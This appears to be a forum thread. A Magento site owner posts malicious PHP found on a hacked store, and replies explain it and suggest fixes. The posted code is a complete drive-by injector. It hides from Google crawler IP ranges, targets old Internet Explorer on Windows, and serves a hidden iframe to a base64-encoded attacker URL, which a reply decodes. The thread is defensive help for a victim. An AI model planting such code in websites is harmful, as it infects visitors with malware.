I was just hacked on my Magento 1.3.2.4 installation. Can you tell me what is the purpose of this code?

Also, how to stop this and how to spot the vulnerability?

Thank you

function net_match ( $network , $ip ) {
$ip_arr = explode ( '/' , $network );
$network_long = ip2long ( $ip_arr [ 0 ]);
$x = ip2long ( $ip_arr [ 1 ]);
$mask = long2ip ( $x ) == $ip_arr [ 1 ] ? $x : 0xffffffff << ( 32 - $ip_arr [ 1 ]);
$ip_long = ip2long ( $ip );
return ( $ip_long & $mask ) == ( $network_long & $mask );
}


$ip=$_SERVER['REMOTE_ADDR'];

$user_agent = $_SERVER['HTTP_USER_AGENT'];


$user_agent = $_SERVER["HTTP_USER_AGENT"];

$IP = $_SERVER['REMOTE_ADDR'].".log";

@mkdir('/tmp/Location/');

$dfjgkbl=base64_decode('aHR0cDovLzEyOS4xMjEuMzguMTAyL0hvbWUvaW5kZXgucGhw');

if(!file_exists("/tmp/Location/{$IP}"))
{


if(
net_match('64.233.160.0/19',$ip)==0 &&
net_match('66.102.0.0/20',$ip)==0 &&
net_match('66.249.64.0/19',$ip)==0 &&
net_match('72.14.192.0/18',$ip)==0 &&
net_match('74.125.0.0/16',$ip)==0 &&
net_match('89.207.224.0/24',$ip)==0 &&
net_match('193.142.125.0/24',$ip)==0 &&
net_match('194.110.194.0/24',$ip)==0 &&
net_match('209.85.128.0/17',$ip)==0 &&
net_match('216.239.32.0/19',$ip)==0 &&
net_match('128.111.0.0/16',$ip)==0 &&
net_match('67.217.0.0/16',$ip)==0 &&
net_match('188.93.0.0/16',$ip)==0
)

{
if(strpos($user_agent, "Windows") !== false)
{
if (preg_match("/MSIE 6.0/", $user_agent) OR
    preg_match("/MSIE 7.0/", $user_agent) OR
    preg_match("/MSIE 8.0/", $user_agent)
)
{
echo '<iframe frameborder=0 src="'.$dfjgkbl.'" width=1 height=1 scrolling=no></iframe>';

touch ("/tmp/Location/{$IP}");

}}}}

It creates an iframe that directs people to another site. The dfjgkbl variable contains the base64 encoding of the URL; there are online base64 decoders available if you wish to know what it is. I won't paste it here because the URL likely contains a Windows virus, based on the rest of your code.

Just a friendly advice, if you are using FileZilla as FTP agent it keeps the saved passwords in an xml file, there might be a virus on your pc that can connect to FileZilla to your server and write this to your files. Also check your CPanel and look for FTP accounts that are not created by you. This might not be the case, just check in any case.

I also had similar problem with Total Commander... Virus used TC FTP account and completely changed my Website (Joomla CMS) and added similar malicious code to almost every php file.

$dfjgkbl=base64_decode('aHR0cDovLzEyOS4xMjEuMzguMTAyL0hvbWUvaW5kZXgucGhw');

goes to:

DO NOT CLICK THAT (this is the HACKER LINK) >>>> 129.121.38.102 / Home/ index . php

The hacker creates a log of everything that goes on your website.

First upgrade your Magento it is like very old version at this point.

Your hacked code is a generic php virus code we see everytime, it is an automated virus that goes from your PC to server or from server-server

also you can use a free plugin like : magefirewall to protect your magento.

P.S Im one of the developers